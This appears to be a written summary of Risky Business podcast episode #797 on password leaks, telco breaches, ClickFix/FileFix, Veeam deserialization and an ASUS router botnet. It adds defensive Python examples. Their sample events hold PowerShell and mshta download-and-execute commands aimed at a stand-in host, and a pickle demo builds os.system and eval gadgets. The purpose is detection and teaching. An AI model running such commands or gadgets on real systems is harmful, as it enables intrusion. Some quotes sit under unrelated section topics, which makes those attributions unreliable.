Risky Business #797 – Stuxnet vs Massive Ordnance Penetrators
Released on June 25, 2025
Hosts: Patrick Gray and Adam Boileau
Introduction
In episode #797 of Risky Business, hosts Patrick Gray and Adam Boileau delve into a wide array of pressing information security topics. From debunking massive password leak claims to exploring sophisticated cyber threats against critical infrastructure, the duo provides insightful analysis and expert commentary on the latest developments in the cybersecurity landscape.
Debunked Password Leak of 16 Billion Passwords
The episode kicks off with a discussion about a sensational news story claiming a massive leak of 16 billion passwords—a figure so astronomical it defies credibility.
Patrick Gray (00:00):
"Did you hear that there's been a huge password leak of 16 billion passwords? Of course, this has been a dodgy news item that has somehow managed to escape from a niche outlet into the mainstream media."
Adam Boileau (01:16):
"It is as many people, you know, kind of expect, you know, just a repackaging of a bunch of additional existing credential dumps..."
The hosts clarify that the supposed leak is likely an aggregation of previously stolen credentials without any deduplication, making the 16 billion figure misleading. Despite its dubious origins, the story highlights crucial best practices: using unique passwords for each service, leveraging password managers, enabling multi-factor authentication (MFA), and adopting modern passkeys.
Telco Breaches by Salt Typhoon
Patrick and Adam shed light on recent cybersecurity breaches targeting telecommunications companies, attributed to the Salt Typhoon group.
Patrick Gray (04:27):
"It looks like, yeah, Viasat and some mob in Canada have disclosed that they've experienced breaches as a result of this group."
Adam Boileau (04:55):
"They shelled the box and then set it up for intelligence collection and presumably moved laterally around the network and had a good rummage because that's what you do when you hack a telco."
Salt Typhoon, known for its intelligence-oriented cyber operations, exploited unpatched vulnerabilities in Cisco IOS XE devices to get a foothold, then used the compromised edge devices for collection and lateral movement inside the targeted telcos. The breaches underscore the importance of timely patching of internet-facing network equipment and of monitoring those devices, which rarely run endpoint security, for unexpected configuration changes.
US Cyber Strikes and GPS Jamming in Iran
The hosts discuss the United States' cyber operations against Iran, focusing on GPS jamming in the strategically vital Strait of Hormuz.
Patrick Gray (06:04):
"Some of the quality humor on this one as well. I think someone pre-generated every like 4 and 6 and 8 digit number or something, whacked it in a database and described it as a breach of every single OTP code."
Adam Boileau (07:02):
"Anything that kind of messes up with these systems does have some downstream consequences."
General Dan Caine, Chairman of the Joint Chiefs of Staff, acknowledged Cyber Command's role in these strikes, although specific actions remained undisclosed. The GPS jamming led to anomalies in ship tracking, illustrating the tangible downstream impacts of interference with positioning systems on maritime operations.
Iran’s Cyber Activities Against Albanian Municipalities
The conversation shifts to Iran's cyber offensives against Albanian municipal systems, a continuation of Tehran's retaliation against Albania for hosting the MEK (Mujahedin-e Khalq) opposition group.
Adam Boileau (16:11):
"Jeffrey Lewis, that's right. Yeah, yeah, yeah, yeah. So if you want to hear Dimitri interviewing Jeffrey Lewis about that, I highly recommend it."
Patrick Gray (17:20):
"And they're like, really not great as well because you think, oh, Iranian opposition, they've got to be good. And it's like, well, not really. They're quite horrible as well."
Iranian cyber actors disrupted municipal functions in Albania, affecting services such as child registration for kindergarten. This form of cyber retaliation against opposition abroad highlights the expanding frontiers of cyber warfare.
Ransomware Attack on Tonga's Ministry of Health
The hosts address the alarming ransomware attack on Tonga’s Ministry of Health, a small nation with limited resources.
Patrick Gray (19:25):
"It's a very, very dumb I think awaiting sentencing at this point. But this happened back in like April last year..."
Adam Boileau (20:26):
"It's pretty hard. It sounds like Australia has dispatched some incident responders to help..."
The ransomware incident paralyzed Tonga’s healthcare services, demonstrating how cybercriminals exploit smaller nations’ vulnerabilities. Australia’s swift response in dispatching incident responders underscores the importance of international cooperation in mitigating cyber threats.
Arrests Related to Ryuk and REvil Ransomware
Patrick and Adam cover the recent arrests linked to notorious ransomware strains, highlighting ongoing law enforcement efforts against cybercriminals.
Adam Boileau (21:40):
"This guy, I think they seized something like what, $600,000 worth of crypto, nine luxury cars and 24 bits of land."
Patrick Gray (22:38):
"They were arrested for carding and yeah, they've now been released for time served after a few years."
A Ryuk-associated individual was extradited from Ukraine to the U.S., while Russian authorities released several REvil members after they served time for payment card fraud. These cases illustrate the global nature of ransomware operations and the uneven outcomes when prosecution depends on the jurisdiction that holds the suspect.
SpecterOps Research on OneLogin Identity Provider Exploit
The episode delves into a concerning vulnerability within OneLogin's identity provider (IdP) system, uncovered by SpecterOps.
Adam Boileau (23:21):
"They were able to impersonate every user in that particular company's single sign on system."
Patrick Gray (24:53):
"This is the problem with putting everything up in the cloud is right."
The flaw allowed an attacker with limited access to mint valid authentication tokens and thereby impersonate any user in the affected tenant's single sign-on system. OneLogin's slow and piecemeal response underscores the concentration of risk in a cloud identity provider: a bug in the IdP is a bug in every application federated behind it, and the customer has no mitigation of its own to apply while waiting for the vendor.
libxml2 Maintainer's Frustration and Security Policy
Patrick and Adam discuss the challenges faced by the sole maintainer of the widely used libxml2 library, highlighting broader issues in open-source software security.
Adam Boileau (27:05):
"It is foolish to use this software to process untrusted data."
Patrick Gray (29:22):
"Yep, Mic drop."
The libxml2 maintainer, overwhelmed by a steady stream of security bug reports he is expected to triage for free, has adopted a blunt security policy that says the library should not be used to process untrusted data. This candid stance reflects the difficulties single maintainers face in keeping critical open-source projects afloat, and the exposure of organizations that parse attacker-supplied XML with such libraries without funding or supporting their upkeep.
Social Engineering Campaigns Targeting Advanced Users
The hosts explore sophisticated social engineering tactics aimed at high-profile targets, such as academics and think tankers.
Adam Boileau (32:16):
"It's a cunning campaign because it exploits that lack of understanding about how all these systems work."
Patrick Gray (39:42):
"If you run big estates of Windows users, probably this should be on the list of things that you should spot."
Attackers impersonated legitimate entities to trick users into generating application-specific passwords, facilitating unauthorized access to sensitive accounts. These campaigns exploit the complexities of modern authentication systems, underscoring the necessity for user education and enhanced security measures.
ClickFix and FileFix Attack Vectors
Patrick and Adam highlight two crude yet effective attack methods, ClickFix and FileFix, that rely on tricking users into executing malicious commands themselves.
Adam Boileau (35:43):
"People fall for it. I know, you know, I was surprised when I saw this and went, you know, like, surely, surely no one would."
Patrick Gray (37:57):
"I don't think this is as much of a risk to corporate Environments as just, you know, normal home users."
ClickFix tricks users into pasting commands into the Run dialog, while FileFix manipulates the Windows Explorer address bar to execute PowerShell commands. Though rudimentary, these tactics exploit common user behaviors, making them surprisingly effective despite their simplicity.
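Neither technique exploits a vulnerability, so the practical defence is spotting the resulting process tree. The block below is an added example, not code from the podcast or its hosts, that runs a small ClickFix/FileFix detector over constructed Sysmon-style process-creation records. It assumes that both the Run dialog and the File Explorer address bar hand the pasted text to explorer.exe (so the interpreter's parent is explorer.exe), and that a FileFix lure hides the real command behind a `#` comment followed by a plausible file path; the field names, patterns and sample events are all assumptions made for the demonstration.

```python
"""Added example (not from the podcast or its hosts): a minimal detector for
the ClickFix / FileFix pattern over process-creation events.

Assumptions: events are Sysmon-style records with ParentImage, Image and
CommandLine fields; both the Run dialog (ClickFix) and the File Explorer
address bar (FileFix) hand the pasted text to explorer.exe, so the spawned
interpreter's parent is explorer.exe; and the FileFix lure hides the real
command behind a '#' comment followed by a plausible file path.  Every
sample event below is constructed."""
import ntpath
import re

# Interpreters and LOLBins that a pasted one-liner typically launches.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
           "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# Command-line traits of the pasted payload; each hit yields a reason string.
PATTERNS = [
    (re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I), "hidden window"),
    (re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I),
     "download/execute cradle"),
    (re.compile(r"\bmshta(\.exe)?\s+https?://", re.I), "mshta loading a remote HTA"),
    # FileFix lure (assumption): real command, then '# C:\...\file.docx' so the
    # address bar appears to hold a path rather than a command.
    (re.compile(r"#\s*[A-Za-z]:\\\S+"), "'#' comment disguising the command as a file path"),
]


def _base(path):
    """Lower-cased file name of a Windows path, regardless of host OS."""
    return ntpath.basename(path).lower()


def find_reasons(event):
    """Return the reasons an event matches the pattern; empty list means clean."""
    if _base(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if _base(event.get("Image", "")) not in LOLBINS:
        return []
    cmd = event.get("CommandLine", "")
    return [label for rx, label in PATTERNS if rx.search(cmd)]


def scan(events):
    """Return (index, reasons) for every suspicious event, in input order."""
    hits = []
    for i, ev in enumerate(events):
        reasons = find_reasons(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed events; 203.0.113.0/24 is a documentation range, not a real host.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # ClickFix: Run dialog -> hidden PowerShell pulling a script from the lure site
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -c \"iex (iwr 'http://203.0.113.10/verify.ps1' -UseBasicParsing)\""},
    # FileFix: address bar -> PowerShell with the command hidden behind a '#' and a fake path
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -c \"$u='http://203.0.113.10/a.ps1';iwr $u|iex\" # C:\\company\\internal-secure\\filedrive\\HRPolicy.docx"},
    # Benign: user opened a text file from Explorer
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    # Benign: plain cmd from Explorer, no payload traits
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
    # Download cradle, but parent is an editor, not explorer.exe: out of scope for this rule
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -c \"iwr http://203.0.113.10/tool.ps1 | iex\""},
    # ClickFix variant using mshta instead of PowerShell
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.10/x.hta"},
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine'][:60]}... -> {', '.join(why)}")
```

The rule deliberately keys on the parent being explorer.exe rather than on the interpreter alone, since PowerShell launched from a terminal or an IDE is everyday noise; for a corporate estate, the complementary control is to block the interpreters from running at all for users who have no business need for them.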
Veeam’s Patching Issues with .NET Deserialization Bug
The conversation shifts to Veeam’s ongoing struggles in patching a critical .NET deserialization vulnerability.
Adam Boileau (39:42):
"The bug in question that they patched is a .NET deserialization bug."
Patrick Gray (40:46):
"Same sort of vibes here, so boo to Veeam."
Veeam's approach of blacklisting specific known deserialization gadgets is proving insufficient, because each patch only blocks the chain researchers last reported and a new gadget reopens the same bug. Mitigating the class of issue requires a white-list that names the handful of types the deserializer is allowed to instantiate and rejects everything else.
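The page does not show Veeam's filter, and the example below is not Veeam's code. It is an added example that demonstrates the same black-list versus white-list choice in Python's pickle, whose `find_class` hook plays the role a `SerializationBinder` plays for a .NET deserializer: a black-list that blocks the shell-command gadget is bypassed by a gadget in a module it forgot, while the white-list rejects both and still loads the one legitimate type. The `JobRequest` type, the `Gadget` helper, both lists and all three payloads are constructed for the demonstration.

```python
"""Added example (not Veeam's code; the page shows none): block-list versus
allow-list filtering of a deserializer, written against Python's pickle
because its find_class hook is the direct analogue of a .NET
SerializationBinder.BindToType.  JobRequest, Gadget, both lists and the
payloads are constructed for this demonstration."""
import io
import os
import pickle
from dataclasses import dataclass


@dataclass
class JobRequest:
    """The one DTO this endpoint legitimately expects to receive."""
    name: str
    retries: int


class Gadget:
    """Stand-in for a deserialization gadget: when the pickle is loaded,
    the named callable is invoked with these arguments."""
    def __init__(self, func, args):
        self.func, self.args = func, args

    def __reduce__(self):
        return (self.func, self.args)


# Block-list: modules we already know are dangerous.  Incomplete by the nature
# of the approach: the attacker only needs one module we did not think of.
BLOCKED_MODULES = {"os", "posix", "nt", "subprocess"}


class BlocklistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module.split(".")[0] in BLOCKED_MODULES:
            raise pickle.UnpicklingError(f"blocked: {module}.{name}")
        return super().find_class(module, name)   # everything else resolves


# Allow-list: exactly the types this endpoint needs; nothing else resolves.
ALLOWED = {(JobRequest.__module__, "JobRequest"): JobRequest}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        try:
            return ALLOWED[(module, name)]
        except KeyError:
            raise pickle.UnpicklingError(f"not on allow-list: {module}.{name}") from None


def load_with(unpickler_cls, blob):
    return unpickler_cls(io.BytesIO(blob)).load()


def compare_filters():
    """Run three constructed payloads through both filters.
    Returns {(payload, filter): ("ok", value) or ("rejected", message)}."""
    payloads = {
        "legit": pickle.dumps(JobRequest("nightly", 2)),
        # Classic gadget: would run a shell command on load (never reached here).
        "os.system": pickle.dumps(Gadget(os.system, ("id",))),
        # Same primitive through a module the block-list forgot; eval("2+2")
        # keeps the demonstration harmless while proving code ran on load.
        "eval": pickle.dumps(Gadget(eval, ("2+2",))),
    }
    filters = {"blocklist": BlocklistUnpickler, "allowlist": AllowlistUnpickler}
    results = {}
    for pname, blob in payloads.items():
        for fname, cls in filters.items():
            try:
                results[(pname, fname)] = ("ok", load_with(cls, blob))
            except pickle.UnpicklingError as exc:
                results[(pname, fname)] = ("rejected", str(exc))
    return results


if __name__ == "__main__":
    for (payload, flt), outcome in compare_filters().items():
        print(f"{payload:>9} via {flt:<9}: {outcome}")
```

The "eval" row is the whole argument: the block-list loads it and the embedded expression executes, the allow-list never resolves `builtins.eval` and so never calls it. The same shape applies to a .NET binder: resolve only the DTO types you expect, and fail closed for any other type name, including generic and array type names that embed an inner type.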
Asus Router Botnet Detection (Sponsor Interview)
The highlight of the episode is an exclusive interview with Andrew Morris from GreyNoise Intelligence, discussing the discovery of a botnet composed of ASUS routers.
Andrew Morris (46:49):
"They did not drop malware. They used the baked-in SSH, the Dropbear SSH..."
Patrick Gray (50:33):
"Yeah. But do you throw it into a wood chipper or can you actually fix it?"
GreyNoise detected a botnet that compromised ASUS routers and persisted by adding an SSH key through the router's built-in Dropbear SSH daemon rather than dropping malware. Because the configuration lives in non-volatile memory (NVRAM), a firmware update leaves the backdoor in place. Cleaning such a device means wiping that stored configuration with a full factory reset and re-provisioning it, or, as Morris suggests, discarding the hardware; flashing new firmware on its own is not enough.
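An operator who wants to check a fleet of these routers needs to look at the stored configuration rather than the firmware version. The block below is an added example, not GreyNoise's or ASUS's code, that audits an `nvram show`-style dump for the two traits described above: SSH enabled on an unexpected port and an authorized key nobody provisioned. It assumes the dump is `name=value` lines, that `sshd_enable`, `sshd_port` and `sshd_authkeys` are the relevant variables, and that several keys in `sshd_authkeys` are separated by `>`; confirm those names on your own model. All three dumps and the known-key list are constructed.

```python
"""Added example (not GreyNoise's or ASUS's code): audit an ASUSWRT-style
`nvram show` dump for the persistence described above.

Assumptions: the dump is `name=value` lines; sshd_enable / sshd_port /
sshd_authkeys are the relevant variables; multiple keys in sshd_authkeys are
separated by '>'.  Verify those names on your own router.  Every dump and
key below is constructed."""

DEFAULT_SSH_PORT = "22"


def parse_nvram(dump):
    """Turn `name=value` lines into a dict; the first '=' separates name from value."""
    nv = {}
    for line in dump.splitlines():
        if "=" in line:
            name, value = line.split("=", 1)
            nv[name.strip()] = value
    return nv


def key_identity(key):
    """Key type plus base64 body.  The trailing comment is attacker-controlled
    (an attacker can label a key 'admin@laptop'), so it is excluded."""
    return tuple(key.split()[:2])


def split_authkeys(value):
    """One entry per key, tolerating '>' or newline separators (assumption)."""
    return [k.strip() for k in value.replace(">", "\n").splitlines() if k.strip()]


def audit_nvram(dump, known_keys):
    """Return a list of findings; an empty list means nothing looked wrong."""
    nv = parse_nvram(dump)
    findings = []
    enabled = nv.get("sshd_enable", "0") != "0"
    port = nv.get("sshd_port", DEFAULT_SSH_PORT)
    if enabled and port != DEFAULT_SSH_PORT:
        findings.append(f"sshd enabled on non-default port {port}")
    known = {key_identity(k) for k in known_keys}
    for key in split_authkeys(nv.get("sshd_authkeys", "")):
        ident = key_identity(key)
        if len(ident) < 2:
            findings.append(f"malformed authorized key entry: {key!r}")
        elif ident not in known:
            findings.append(f"unrecognised authorized key: {ident[0]} {ident[1][:16]}...")
    return findings


# Constructed: the key the administrator actually installed.
KNOWN_KEYS = ["ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAdminKeyConstructed admin@laptop"]

# Constructed: sshd moved to a high port and a second key appended after the admin's.
SUSPECT_DUMP = """wan_proto=dhcp
sshd_enable=1
sshd_port=53282
sshd_authkeys=ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDConstructedAttackerKey0000 root@router>ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAdminKeyConstructed admin@laptop
lan_ipaddr=192.168.1.1
"""

# Constructed: attacker key wearing the admin's comment to fool a comment-based check.
LOOKALIKE_DUMP = """sshd_enable=1
sshd_port=22
sshd_authkeys=ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAttackerKeyConstructed admin@laptop
"""

# Constructed: SSH on the default port with only the admin's key.
CLEAN_DUMP = """wan_proto=dhcp
sshd_enable=2
sshd_port=22
sshd_authkeys=ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAdminKeyConstructed admin@laptop
lan_ipaddr=192.168.1.1
"""

if __name__ == "__main__":
    for label, dump in [("suspect", SUSPECT_DUMP), ("lookalike", LOOKALIKE_DUMP), ("clean", CLEAN_DUMP)]:
        print(label, audit_nvram(dump, KNOWN_KEYS) or "no findings")
```

Run it against a dump taken before and after a firmware update and the attacker's entries will be present in both, which is exactly the persistence Morris describes; after a factory reset and re-provisioning the audit should come back empty.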
Fake WiFi Access Points in Perth for Credential Harvesting
Patrick and Adam also discuss a case where an individual set up rogue WiFi access points at airports and even on board aircraft to harvest credentials.
Patrick Gray (42:00):
"What's really interesting here is like I think it was air crew or someone who noticed something weird and that's how he got caught."
Adam Boileau (44:29):
"You aren't getting to NORDVPN until after you've been through this captive portal process. So."
The perpetrator used fake captive portals, the login pages travellers expect from public WiFi, to trick users into entering sensitive information such as iCloud credentials before any VPN could connect. The swift detection and apprehension, prompted by airline staff noticing something odd, highlight the effectiveness of human vigilance against such low-tech yet impactful attacks.
Conclusion
Episode #797 of Risky Business offers a comprehensive overview of current cybersecurity threats and vulnerabilities. From the persistence of botnets in consumer hardware to the evolving tactics of cybercriminals and state actors, hosts Patrick Gray and Adam Boileau provide valuable insights into safeguarding against an increasingly complex threat landscape. The episode underscores the importance of proactive security measures, robust patch management, user education, and international cooperation in mitigating cyber risks.
Notable Quotes:
- Adam Boileau (32:16): "It's a cunning campaign because it exploits that lack of understanding about how all these systems work."
- Adam Boileau (27:05): "It is foolish to use this software to process untrusted data."
- Andrew Morris (50:50): "Rip it off the wall and into the wood chipper."
